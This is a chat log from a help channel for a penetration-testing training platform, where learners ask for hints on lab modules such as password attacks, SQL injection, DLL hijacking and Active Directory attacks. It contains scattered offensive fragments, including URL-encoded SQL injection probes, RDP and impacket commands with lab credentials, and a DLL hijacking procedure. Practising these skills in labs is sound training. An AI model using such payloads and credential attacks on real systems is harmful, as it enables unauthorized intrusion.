tranquil wren
#

i was trying to use auth keys file for another users login i found

#

for ssh lol

hasty mauve
gray yacht
gray yacht
bold niche
bold niche
rustic sage
tranquil wren
#

got the flag thanks again @gray yacht

swift dove
#

Hey guys anyone on the Attacking AI - Application and System the MCP part recently?

#

Hey HF were you able to finish the module?

edgy ember
supple dragon
desert inlet
rain mirage
#

Password Attacks
Credential Hunting in Windows

question: What password does Bob use to connect to the Switches via SSH? (Format: Case-Sensitive)

i got the password of the port 22 but for some reason its not accepting it , its "__admin*** " right?

#

any hints?

autumn garnet
median kettle
#

has anyone had trouble with the pass the certificate portion for password attacks? i cant get printerbug.py to work. nothing happens after i hit enter

median kettle
median kettle
strong acorn
#

Soc Analyst / Windows Event Logs & Finding Evil / Analyzing Evil With Sysmon & Event Logs

Replicating the DLL Hijacking with calc.exe doesn't work.

Steps:

  1. Renaming reflective_dll.x64.dll to WININET.dll
  2. moving calc.exe from C:\Windows\System32 along with WININET.dll to a writable directory (such as the Desktop folder)

Step 2 doesn't work since I don't have trusted access to the RDP. I can't move the calc.exe to any other folder.

swift dove
swift dove
#

What do you need help with?

pallid pilot
#

Hey mates, can somebody help me, im doing the Advanced SQLi SA, by now y can exfiltrate the data of the two users in the data base, but when i craft the reset key using python and java with the same functions, the page throws me invalid key message, if somebody can help me let me know, i can DM u o u can DM me

river furnace
#

Bro why delete

cloud urchin
#

@river furnace This server isn't support for video games. Contact the makers of the game.

rotund sorrel
#

anyone experiencing issues with boxes not starting?

strong acorn
#

L channel L support fr

cloud urchin
#

@river furnace I don't care who said what. We can't help with this. This is not the server for that.

strong acorn
#

wtf

rotund sorrel
#

im witnessing a meme in the making

strong acorn
#

Telegram bro

#

lol

pallid pilot
strong acorn
strong acorn
#

I think you should use Event Viewer but I didn't

safe star
#

what about copying instead of moving

strong acorn
#

doesn't work

#

u should run calc.exe after doing the steps and a message box should pop up

#

it runs calc normally

safe star
#

yeah dont see why admin wouldnt work

strong acorn
#

Ok Solved

strong acorn
#

you gotta run "calc.exe" in user-mode cmd

#

what a mess fr!

rotund sorrel
#

hey im stuck on the 3rd question of the password cracking module, subsection windows lateral movement and pass the hash

#

ive succesfully ran netexec to change the DisableRestrictedAdmin to 0 (0x0), but connecting through xfreerdp3 with /pth:hash still fails

cosmic hornet
#

If I buy annual Silver Annual Plan, can I cancel and get remained refund at anytime?

strong acorn
safe star
#

so just clicking it doesnt work?

strong acorn
cosmic hornet
#

If I buy annual Silver Annual Plan, can I cancel and get remained refund at anytime? Should I ask the question here or anywhere else?

waxen totem
#

cancelling it just wont make it renew next year

safe star
#

did you enter with winrm first

cosmic hornet
cloud urchin
tranquil sluice
#

Hey, I am currently doing the "intro to whitebox pentesting" module, on skill assessment Q2.
I have patched the code to the point that it works and AI engines do not find vulnerabilities. However the site does not accept it and returns "result: injection failed" but does not return the flag, which is weird because that's the entire point of the exercise.

Can anyone please help?

median kettle
#

has anyone had trouble with the pass the certificate portion for password attacks? i cant get printerbug.py to work. nothing happens after i hit enter

spiral sapphire
#

Since Academy content regarding Windows is on Windows 10 boxes, is it also valid for Windows 11?

cloud urchin
#

Yes

#

Windows 11 is Windows 10, just with more stuff

spiral sapphire
cloud urchin
#

yeah i never encountered anything

median kettle
#

anyone toss me a hint or some help?

spiral sapphire
cloud urchin
#

most of it will work on older versions of windows too, windows doesn't really change that much from version to version

#

all the basics are still there, like groups, permissions, acl's, etc

#

they don't actually rebuild the whole OS from scratch every time

spiral sapphire
cloud urchin
#

nah, you usually attack windows misconfigurations rather than vulnerabilities

obsidian stone
#

hello

#

im stuck in the wordpress skill assessment if anyone could help

#

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

#

if i found the pluging how can i find the fiel for that ?

tranquil crystal
#

Module: Shells & Payloads > (page 5) Reverse Shells

I am connected to the academy VPN. I started the instance. When I try to ping it, no route to host. I'm not sure what's going on.

tranquil crystal
#

I've never had this issue before.
I just did a previous module which required me to be on Academy VPN
I switched VPN to US Academy 1. Download the vpn file. Connect to it. I do ip a and I get tun0 up with a 10.x IP.
I try to ping the machine instance and Destination host unreachable.

swift dove
#

I think the Skill Assessment of Attacking AI System is broken.

acoustic owl
tranquil crystal
#

Well I can't even connect to it via rdp

acoustic owl
#

try it with the pwnbox

tranquil crystal
#

ok. thanks

gaunt forge
#

I'm also running a vm now and testing connections back to my linux machine for practice

simple marten
#

I'm in the introduction to information security module for mobile security and it says how many layers are in device security. I put the answer as <4> according to the format suggested for the answer but it says it's incorrect

safe star
#

What about just 4

cobalt adder
#

anyone got any recommendations on what modules to move onto? literally just finished the basic starter tutorial, im going for just learning it to have as a skill currently

dark hedge
cobalt adder
#

what does that teach?

haughty fiber
#

The import is not working. Tried through evilwin and meterpreter

gaunt forge
#

@autumn garnet did u end up getting the shellcode loader to work? i never got it working but the revshell later worked. i just started using msvenum launching notepad shellcode but that still fails

full patio
#

I anyone else currently experiencing issues with the web shell in AD Enumeration & Attacks - Skills Assessment Part I? 🤔

eager basalt
#

hi, I am new to htb.
I have an issue where I can connect to htb openvpn but to get into the website first I have to connect some vpn first because of my location. so double vpn, I can spwn the machines with openvpn connected but ping and other remote stuff doesn't work.

I am dying to learn htb but because of that issue, I can't even pass starting point meow, because telnet keeps disconnecting.

is there any vpn solution for this ? thanks

acoustic owl
#

Take a look at the PwnBox

main swallow
#

Hi everyone, I'm new here and just started htb and wanted to know for the "craking into htb" path. Could i ask some advices and also i have some questions like for free users when you accidentally close the VM workstation do u have to wait 24h and one last thing is there any offer and discount for students?

cloud urchin
#

There's a student subscription that is heavily discounted

gritty bay
#

anyone i can dm for cl.te ?

clever helm
main swallow
#

And how can I subscribe as a student

crude grove
#

hello everyone
i'm stuck on this question, i've found creds for the user in previous question, but I don't know where to use them (that's all I can say here)

can someone help plz,thank you

clever helm
#

On your account then 💥

main swallow
#

Thanks for the help

fathom pendant
#

could be rdp, winrm, etc.

limber river
#

seems like the old rdp problems stills there

fathom pendant
#

it also helps to know what module and section you're working on @crude grove

limber river
#

pivoting it's tooo vague

fathom pendant
#

common remote access

#

maybe rdp to an internal machine

#

because the question mentions (For your next hop)

#

:)

crude grove
fathom pendant
#

that's the simple answer ¯_(ツ)_/¯

crude grove
#

i will feel so stupid if this will work 🙂 ,thank you, i'll try it

upper fern
#

Hey @everyone
I’m currently diving into Mobile Pentesting and learning more about bypassing Dynamic SSL Pinning on Android apps.
I’ve tried some approaches using Frida and Objection, but I’d love to hear from the community:

🔹 What are your go-to tools or techniques for effectively bypassing SSL Pinning in real-world scenarios?
🔹 Any recommended writeups, scripts, or labs I should check out?

Thanks in advance for any advice or pointers 🙏

acoustic owl
acoustic owl
upper fern
# acoustic owl The Academy offers various modules that deal with mobile pentesting.

Thanks for the reply
I’ve already gone through the Academy modules on mobile pentesting and learned a lot from them.
Now I’d like to take my skills to a more advanced level, especially around bypassing dynamic SSL pinning and building stronger defenses.

Do you have any recommendations for advanced resources, labs, or tools that go beyond the Academy content?

worn ginkgo
#

hey guys
Password Attacks

Pass the Ticket (PtT) from Linux

Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

i got till here but smbclient is not responding. need help in this please.!

strong acorn
#

You guys need to rework that Windows Event Logs module, this shit is ass. No proper info, no pre-built environment that is ready for the steps, needs lots of steps to reproduces whatever is needed to solve the questions, not enough guidance through steps to reproduce. Like wth is that module for

cloud urchin
pallid pilot
#

Hello, can somebody help me with the Advanced SQLi SA, in the question two, i can bypass the filter with the ' encoded ||%27|| and i can run some payloads like ||34%27%20AND%201%3D1%20%2D%2D|| but when i wnat to run the RCE payload like SELECTS and this stuff i dont achieve the execution, i will appreciatte a hint or somthing, actually i already try ||; SELECT||

hollow holly
#

Hi everybody, what can i do when a target is stuck in "spawning" stage except waiting?

cloud urchin
#

@cyan lily You can report it to WhatsApp. This also has nothing to do with HTB or modules, please stay on topic.

cyan lily
#

Oh sry

cloud urchin
#

@plain summit Please take care not to post content from modules above tier 0

plain summit
cloud urchin
#

Spoiler tags do nothing

pallid pilot
#

Hello, if somebody have the time and can help me with my script, I achieve to create the large_object but i dont know how to create the function, DM me if u want to help me with my payload or just give me a hint thanks a lot

cloud urchin
pallid pilot
jade frigate
#

I need help with AD Enumeration & Attacks question 2, my meterpreter exploit is not working

cloud urchin
#

@jade frigate Please take care not to post content from modules above tier 0

jade frigate
cedar sedge
#

Hey

atomic crest
#

Hey everyone I wanted to ask about the last challenge of ai red teaming ctf going live. Can anyone help me with that

waxen totem
agile cedar
#

xfreerdp /v:10.129.43.43 /u:sql_dev /p:'Str0ng_P@ssw0rd!' /cert-ignore -sec-nla +sec-tls +sec-rdp when I run this command in windows privilege esclation module then I get this "to signin remotely you need to right through sign in remote desktop services by defaul member of remote desktop user have this right, if your group don't have this right or the right have been removed from the remote desktop user group then you have to grant this right manually" , but how can I grant the right manually without the access or privilege of that devices, anyone please help how to fix this issue

cloud urchin
#

You find a way to add yourself to the group or login with a user who is already in the group

agile cedar
autumn pilot
#

Which section are you working on?

agile cedar
#

SeImpersonate and SeAssignPrimaryToken

autumn pilot
#

Focus on the name of the user and what services he can access

#

It was showcased in the section as a hint

agile cedar
gray field
#

Modules > Intro to C2 Operations with Sliver.
I install
[] Client v1.5.43 - e116a5ec3d26e8582348a29cfd251f915ce4a405 - windows/amd64
Compiled at 2025-02-20 04:58:51 +0900 KST
Compiled with go version go1.20.7 linux/amd64
[
] Server v1.5.43 - e116a5ec3d26e8582348a29cfd251f915ce4a405 - windows/amd64
Compiled at 2025-02-20 04:58:51 +0900 KST in windows 11.
When I execute 'armory install all' command, i can't install all files.
Is there any solutions to solve the problem?

hexed tartan
#

in this module

gray field
gray field
# hexed tartan I did the room using pwnbox

I see. When I run sliver in kali, it execute command well but in windows I can't install the armory extensions and exe files. It could be windows problem. Thx. I have to find the way to install sliver in windows.

flat lark
#

/bin/dash is symlink to /bin/bash or dash is symlink to /bin/bash

little terrace
#

in the pivoting modules, the victim box interface is always xx.xx.xx.xx/16
why do i route /24 instead of /16 when i use ligolo?

waxen totem
stable flume
#

Guys does module pwnbox has "'save progress" feature or such thing? im tired redoing all the stuff i already done when i decide to take break...

waxen totem
stable flume
waxen totem
rugged hull
#

Uhm sorry but how am I going to fix this? (I've tried changing my VPN but it keeps saying that I don't have any instances left).

surreal goblet
#

Hi all

#

i need a help

river grove
waxen totem
surreal goblet
waxen totem
#

Read through that section's Footprinting/Nmap header again the answer is actually already in the example output.

faint geode
floral fulcrum
#

could i get a little nudge for HTTP Attacks - HTTP Response Splitting? managed to get it to work with ||?target|| but not sure what the error is

devout lily
#

"This is different for rejected packets that are returned with an RST flag. These packets contain different types of ICMP error codes or contain nothing at all." I think this is incorrect, right? When a firewall rejects a packet sends back an ICMP message, RST packet is sends back by an open/closed port using the TCP-ACK scan

waxen totem
digital pendant
#

Just on web attacks - mass idor enumeration section. The Lab is taking well over 15 minutes for ito to load and now coming up to 5 minutes to load the main page, clicking on documents within took another 5 minutes more or less. Is there something that would be slowing this down? trying new vpn now but idk if its that.

jade frigate
#

The Web Proxies module is a bit outdated when we get to the step-by-step of configuring ZAP and Foxy Proxy, some of the print screens and steps doesn't exist anymore

jade frigate
rotund flare
#

Hey everyone this is my first time here . I’m starting my career in i.t soon and I’m graduating with a degree in i.t but my end goal is cybersecurity. I’ve been debating on either going back and getting my bachelors degree in cybersecurity or just go the certification route. Does anyone have any advice on what I should do?

grizzled schooner
#

Looking for some help on Attacking Domain Trusts - Child -> Parent from Linux

I have the ccache ticket, ligolo set up, tunnel is started

psexec and raiseChild just fail with [-] [Errno Connection error (LOGISTICS.INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused

If anyone can nudge me as to why it's failing that would be great! Please @ with replies

light palm
#

can someone help with the Burp intruder fuzzing, the challenge is to fuzz for '.html' files under the /admin directory but I have been fuzzing for 30 minutes with nothing (USING WEB PROXIES module)

warm trench
#

I'm working on Stack-Based Buffer Overflows on Linux x86 - Skills Assessment - Buffer Overflow. I've gotten to the point where I can launch a reverse shell and run commands. I've also tried to use the linux/x86/exec and linux/x86/read_file shellcodes. However, no matter what I use I don't have permissions to access the flag.txt file under /root. Can someone give me a hint as to what to try next?

normal glacier
#

Hey everyone has someone finished Android Fundamentals, if yes, can you send me the answer?

acoustic owl
#

You can ask questions here, such as:
I am in module XXX, section YYY, and am stuck on question ZZZ. Can anyone help me?
If someone has worked through the module, they can probably give you tips on how to find the solution.

light palm
grave badge
#

I am in module Funnel and I am trying to set up my local port forwarding. I believe that the start of the command is ssh -L <LOCALPORT>:<REMOTE_HOST>:<REMOTE_PORT> USERNAME@SSH_SERVER ... But am I supposed to do that on my attack box or the target?

grave badge
normal glacier
#

Have anyone answer this question:
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

#

I tried useing Android Studio, that the answer is wrong

grizzled schooner
dense tendon
#

Maybe someone can help with the PHP Wrappers module, I enter the command as indicated in the example, but I do not display what it should, I don’t understand why other symbols sharply appear there.

#

this is the example:

waxen totem
dense tendon
quiet heart
dense tendon
#

In the example +Cg== is replaced by %2BCg%3D%3D, I do not understand why.

dense tendon
waxen totem
dense tendon
#

I encoded it in Burp and got it:

waxen totem
#

don't encode all the characters

worn ginkgo
fathom pendant
worn ginkgo
dense tendon
waxen totem
#

Restart the lab

#

I just checked and I'm unable to connect either

dense tendon
waxen totem
uneven crater
#

hello, little bit of topic but can someone help me with a ctf http head attack?

acoustic owl
grizzled schooner
tranquil crystal
#

Module: Shells & Payloads
Section: Live Engagement

What distribution of Linux is running on Host-2? (Format: distro name, all lower case)

I have got the metasploit module for this blog version. I setup the options, type exploit, and it fails:

Any advice?

It says no CSRF token found, can't continue

tranquil crystal
#

There is no csrf token in the html source. The exploit doesn't seem to work.

#

Oh you have to set the vhost parameter too. Doh. I got it now

quartz ridge
#

hi guys how are you ?

#

i try web requests > CRUD API

#

and i cant solve this ctf

#

First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.

#

i was did this . but dont see flag

#

curl -s 94.237.61.242:36315/api.php/city/flag
[{"city_name":"flag","country_name":"HTB"}]

tranquil crystal
#

Is there a problem with the modules?

I completed this module 100%, but it won't give me the achievement. I went back and looked at every page of the module, every question is done/filled in, completed.

digital pendant
#

Strange it definitely is implying you've missed a section

tranquil crystal
#

I've done the entire module

digital pendant
#

its laudanum one webshell to rule them all @tranquil crystal

#

its not showing as complete....

tranquil crystal
#

Oh let me double check, thanks for the catch!

#

Oh I did miss a question

digital pendant
#

funny enough I did same thing and it was a missing question xD

tranquil crystal
#

Doh.

digital pendant
#

on that section... DUH!

quartz ridge
tranquil crystal
#
muted mountain
#

hello guys, if I get the silver subscription, if I don't spend the 200 cubes, will I have 400 cubes next month?
Is it accumulative ?

fathom pendant
#

user does not exist

digital pendant
#

any of the labs that are not on the 10.x.x.x range seem to be very very very slow -_- becoming painful

#

is it best to report to /support for that?

fathom pendant
#

@icy plume don't share info for modules above tier 0

digital pendant
#

nvm its my proxy being annoying... all this time :d

digital pendant
#

can I get a prod / nudge on Skills Assessment Web Attacks please.

grizzled schooner
#

Super odd question:

Currently working through Attacking Domain Trusts - Cross Forest from Linux

Within their example in the module they use wley for their user but have us sign in for the lab as htb-student. Are we supposed to be taking notes of past "pwned" user creds for these labs? Please @ with replies

digital pendant
#

Not much of an answer for you but that module and couple others did similar

grizzled schooner
#

Nah that makes sense, just a bunch of annoyances to be honest, but thanks

#

``└─$ impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] [Errno Connection error (FREIGHTLOGISTICS.LOCAL:389)] [Errno -2] Name or service not known``

any idea why this error occurs? working through attacking domain trusts - cross forest from linux

rustic sage
#

i've always been wondering how actors behind very sophisticated (potentially state sponsored) cyber attacks stay anonymous, many here probably remembers the not-so-recent-but-recent xz backdoor so i'll use that as an example; one of the actor(s) behind it has a regular github profile with a public email address. how can no one (including microsoft the host of the github platform, the authorities controlling the internet providers, and other hackers with means to gather information illegally) trace them? surely such intrusions attract a global manhunt for them, especially from other cyber security experts. yet they don't even know the country the supposed bad actors are from, let alone any other form identity.

civic estuary
#

Hi Guys, I need help understanding this part in Password Attacks as it is not making sense to me.

In "Pass the Ticket (PtT) from Linux", at the segment of "Using Linux attack tools from Kerberos" where we use chisel on attack host and rdp into MS01 and use chisel thr as well.

What does it mean by transfer?

Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.

grizzled schooner
rustic sage
grizzled schooner
civic estuary
grizzled schooner
#

If I remember correctly yes

grizzled schooner
civic estuary
# grizzled schooner If I remember correctly yes

hmmm feels kinda weird though coz the whole flow seems weird to me as it is:

attack host (no connection to KDC/DC) -> modify host and proxychains file -> use chisel -> xfreerdp into MS01 & excute chisel -> transfer ccache file from LINUX01

digital pendant
civic estuary
#

how do i go from MS01 to LINUX01? i cant connect the dots on it

grizzled schooner
#

Gotta use a pivot, I suggest Ligolo

quasi wave
#

hi for question 2 of Kerberoasting from Linux section of AD Enumeration and Attacks module, I found a list of groups, but I am having trouble narrowing down just groups the user I specify is part of. I tried using the flag to specify the user but its not working.

#

its giving my all local groups I think and not just ones for that user

can someone help me out here?

digital pendant
#

Not the channel for this.

rustic sage
#

@digital pendant do you have any channel for that

grizzled schooner
#

<@&861185840277487616> Not the discord for this

digital pendant
#

Guys take this elsewhere... clearly not the right discord for this

quasi wave
#

I probably am sharing too much so this is an issue

#

I don't want to spoil

grizzled schooner
#

Okay, so, think of your powerful groups - Ent. Admins, Domain Admins, SQL Admins etc --> use grep on the output / findstr on windows

fathom pendant
#

Take it to dms

digital pendant
#

Can't share content from above tier 0 guys

quasi wave
#

I think I had to guess but I got it

#

thanks guys

grizzled schooner
#

You're welcome

grizzled schooner
#

Does anyone have a way to make the whole forest and cross-forests thing more understandable? I'm very lost and confused when it comes to this

dapper crown
#

Hey there... I have just setup a live usb to run pwnbox locally, I am using their vpn(it runs correctly) but when I tried to ssh into a target system it said no route to host

grizzled schooner
#

add the host to /etc/hosts

#

first step I take ^

digital pendant
quiet heart
#

try it with enum4linux

knotty minnow
cloud urchin
rustic sage
#

i dont have an account on your website, i just wanted to discuss general cyber security

cloud urchin
rustic sage
#

i'd like not to, is there some other community i can discuss cyber security?

cloud urchin
naive bison
#

hey, can i ask questions here if I get stuck on something in a tier 3/4 module? and how can I get more cubes, 1000 at least?

cloud urchin
naive bison
naive bison
dull solar
#

<@&861185840277487616>

fathom pendant
#

Don't spoil modules

valid mango
#

@kindred moth nt able to send messages in #general

kindred moth
#

uh ok

#

the fuck do you want

valid mango
#

how to verify ?

kindred moth
valid mango
#

hw to link cant find

flint palm
#

I don't think saying swears is allowed here no?

kindred moth
#

check general lol

#

ffs i cant tell you how bc of automod

valid mango
#

come in dm

kindred moth
#

there

valid mango
#

ok prime minister of us

#

cnt find in general

fathom pendant
tranquil crystal
#

Module: Using the Metasploit Framework
Page 10: Sessions

I am stuck on the last task. The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer. I found two CVE for the vuln. sudo version and neither are working.

Could someone kindly provide a hint? Thanks

kindred moth
flint palm
#

btw how to send messages in general?

kindred moth
#

sigh

kindred moth
#

yep

tranquil crystal
#

I didn't even think to do that...

kindred moth
#

i havent even done the module lol

tranquil crystal
#

I was busy lookingup CVEs and trying to exploit

kindred moth
#

just looked up a writeup on medium

tranquil crystal
#

oh man, I don't wanna look at write ups but thanks

kindred moth
#

yeah fair

tranquil crystal
#

a hint is a hint

kindred moth
#

we need a tool where we can get hints for boxes instead of writeups fr

flint palm
#

guys and where account identifier can be found?

quiet heart
flint palm
#

Yes read welcome and tried to find account identified which should be 60 charachters long

#

didn't find anything that long in my profile

jolly oasis
#

Does anyone know if there's something wrong with Command Injections > Identifying Filters > "Try all other injection operators to see if any of them is not blacklisted. Which of (new-line, &, |) is not blacklisted by the web application?"
https://academy.hackthebox.com/module/109/section/1035
I found the answer but none of the options are accepted as the correct answer (encoded or not)

#

I ended up being able to 'brute-force' the answer. Then took the answer to see if it worked and the answer that is 'correct' does not work.

jolly oasis
#

From the section 1032, I see two different results when encoding

quiet heart
fathom pendant
#

it's treating your input as two separate characters

#

%5C is the encoding for the \ character; however /n or \n is it's own specific character (%0a)

silk anchor
#

Has anyone else had issues with the last question on GPO attacks of DACL II?

Seems to not want to apply any policy updates even when using gpupdate /force.

jolly oasis
fathom pendant
#

it may but again it can read characters weirdly, for you to properly url encode it you'd need to encode the newline (pressing enter) not the \n because it'll likely read it as the separate characters "\" and "n"

jolly oasis
jolly oasis
marsh fulcrum
#

Hey did you manage to do it? Every POST request I do I get redirected to localhost:8080 and get an error, is that really supposed to happen or is something wrong with the instance?

cloud urchin
#

@spark fox No one here can help you with that. Reach out to the company that provided the account.

spark fox
#

Ohk

#

👋

dapper crown
#

Hey there... I have just setup a live usb to run pwnbox locally, I am using their vpn(it runs correctly) but when I tried to ssh into a target system it said no route to host {posting again cuz its not resolved yet...}

cloud urchin
#

what ip does your tun0 give, do you have any more tun adapters running, and what is your ssh command. on parrot it may be ens instead of tun.

hard patio
#

Hey everyone. Has anyone gone through the AI red-team module? I am stuck on two questions as it asks to manipulate the training data as well as the input data on a model and submit your answer.... Kinda confusing because I know how to manipulate both but I have no idea what it is asking to put into the box to submit my answer.. Any help would be appreciated!

left needle
#

Hi I am stuck on Password Attacks module section "Attacking Windows Credential Manager" I got the password to the admin user but I am unable to change my user to "mcharles" as it asks for his password and when I try move to "mcharles" from "sadams" I am "charles" but cannot use mimikatz because of no admin privs for that user

cloud urchin
dapper crown
left needle
cloud urchin
cloud urchin
left needle
dapper crown
cloud urchin
fathom pendant
#

unless i'm misunderstanding and it's 1 am

#

(more than likely the latter)

fathom pendant
dapper crown
fathom pendant
#

my dms aren't open

surreal goblet
#

Hi all

#

I need a help

fathom pendant
#

with?

dapper crown
fathom pendant
left needle
cloud urchin
fathom pendant
cloud urchin
#

Labs and Academy use different VPN's, downoad the VPN from Academy if you want to do modules.

surreal goblet
cloud urchin
fathom pendant
dapper crown
fathom pendant
fathom pendant
surreal goblet
#

so we can?

fathom pendant
left needle
fathom pendant
surreal goblet
fathom pendant
#

Mimi uses different hooks as opposed to the other tool

#

that's why

visual ravine
#

hi guys did anyone earn money here doing this?

fathom pendant
#

i'm sure if you drop the binaries on your local system and use something like ghidra to examine it you can dive deeper into the lower level differences

fathom pendant
visual ravine
#

ok thanks

dapper crown
left needle
# fathom pendant you can do a UAC bypass to get Mimi to work

Thank you so much I understood do I need to jump to privesc module to learn and implement UAC bypass if I wanted to perform UAC bypass or I have to use this types of payload I found on cheatsheet if the UAC level is between 1 to 4 msiexec /quiet /qn /i sample2.msi

fathom pendant
#

there's multiple ways to bypass

#

the cheatsheets only show one way, not the only way

left needle
fossil knot
#

could someone please help me with the "pentest in a nutshell" module I have no clue what I'm doing and have read the whole thing and cant find anything helpful

left needle
#

Hi, I have a question in mind like if "DPAPI" is used to encrypt the chrome passwords or any passwords and using the database keys, tools such as DONPAPI and more are able to decrypt the password but how are we able to get the msterdb key if we are not a privileged user ??

cloud urchin
left needle
#

I have not covered the "Password Attacks" module completely but I think password attacks are especially useful when we have hashes to crack and when we trying to attack a live service for example ftp or smb or any this all depends on the wordlist, so when do I know now I should attack with passwords ?? Generally the way forward is to find misconfiguration or exploit related to the service

cloud urchin
#

Well if you find creds or hashes it's obvious they go to something.

stuck hollow
#

can i ask for help using bloodhound? im doing ANE and with last compromised user im not having same result on bloodhound as htb pictures

golden halo
#

Hey guys, I need help:
Module: Password Attacks
Section: Pass the Certificate
Objective:What are the contents of flag.txt on Administrator's desktop?

Problem: I was able to login to jpinkman using the shadow credentials method and get the flag, I just don't know where to go from there to login as the Administrator, I tried to use mimikatz to find a ticket as jpinkman but I didn't have access to LSASS, and honestly i'm just kind of stuck right now. I haven't utilized the certificate authority address that's given, but I don't know what exactly I would do with it since I assume that the stuff the section covers on that wouldn't apply since you have to wait for connections. Would appreciate a push in the right direction.

Any advice?

lunar dagger
#

I think my module is bugged or something i get the anser but i get an error.The module is Windows fundamentals and the section is skill assesment

#

It took it finaly

heavy mango
prisma elk
#

f

golden halo
# heavy mango There is another technique besides shadow credentials covered in the section you...

I understand that, but the other technique originates from the connection forcing to get a certificate then a TGT using the certificate authority, in the example they use DC01. I see that a dsync attack was used but when I tried to use the jpinkman TGT for that it didn't work. I'm guessing i do need to utilize the certificate authority address since it was given along with the domain controller address, but I'm just not sure how, any advice on that part specifically?

heavy mango
quiet halo
#

ima start doing 1-2 boxes a week for practice. what are the most common web attakcs I should brush up on?

fleet pawn
#

guys is it normal that the clipboard does not work when copying from the xfreerdp window ?

glad flicker
surreal goblet
#

can anyone help me with Footprinting, i found What version of the SMB server is running on the target system but its incorrect

#

Hey anyone?

surreal goblet
#

SMB

fair temple
#

Is anyone learning python?

quiet heart
surreal goblet
#

yes i did

#

-sV

#

?

quiet heart
#

Yeah

surreal goblet
#

thank you

#

goti

surreal goblet
waxen totem
surreal goblet
#

?

waxen totem
#

Read through that section's Footprinting/Nmap header again the answer is actually already in the example output.

digital pendant
#

probably best asked elsewhere though

edgy schooner
digital pendant
edgy schooner
digital pendant
#

You can DM me if you want, not promising I have the answer but managed to get past that point so I must've done something right xD

eager spindle
#

hello,everyone. I need help about module Active Directory Enumeration & Attacks at section AD Enumeration & Attacks - Skills Assessment Part I,this question Find cleartext credentials for another domain user. Submit the username as your answer. I used Rubeus in MS01 to find username but don't see cleartext.Please help

ok I get it with lsa.This is what I wrote after I made it. I don’t want anyone to be stuck here. I hope it can help you.

amber heath
#

Hello everyone! Anyone did the Linux PrivEsc Skill Assessment without using the SSH creds provided? If so can i get a nudge on that? I've already finished it with the ssh creds 🙂

white knoll
#

hi everyone , im stuck with DNS Zone Transfers attack.
i cant understand how to reach inlanefreight.htb
no way .. what i need to put in /etc/hosts to reach it ?
Thx

#

which ip ? i tried with the ip spwaned (ACADEMY-INFOGATH-WEB-DNS) but i dosent work , i can't reach the site

quiet heart
surreal goblet
#

guys can anyone help me with Footprinting im not able to locate full system path of that specific share? SMB shares

rose lagoon
#

Can someone help me in the Footprinting DNS " What is the FQDN of the host where the last octet ends with "x.x.x.203"? I don't find it

surreal goblet
#

SMB

#

last flag

white knoll
surreal goblet
#

Remember that Linux-based operating systems do not have a "C:" drive. this is the hint that i have

rose lagoon
quiet heart
surreal goblet
#

yes i did

#

tried pwd

quiet heart
rose lagoon
# quiet heart Think about brute forcing

|| I did this dnsenum --dnsserver 10.129.92.82 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb ||

surreal goblet
#

ill try it again if u instinct

quiet heart
digital pendant
quiet heart
rose lagoon
surreal goblet
#

thank you

surreal goblet
quiet heart
surreal goblet
#

and?

quiet heart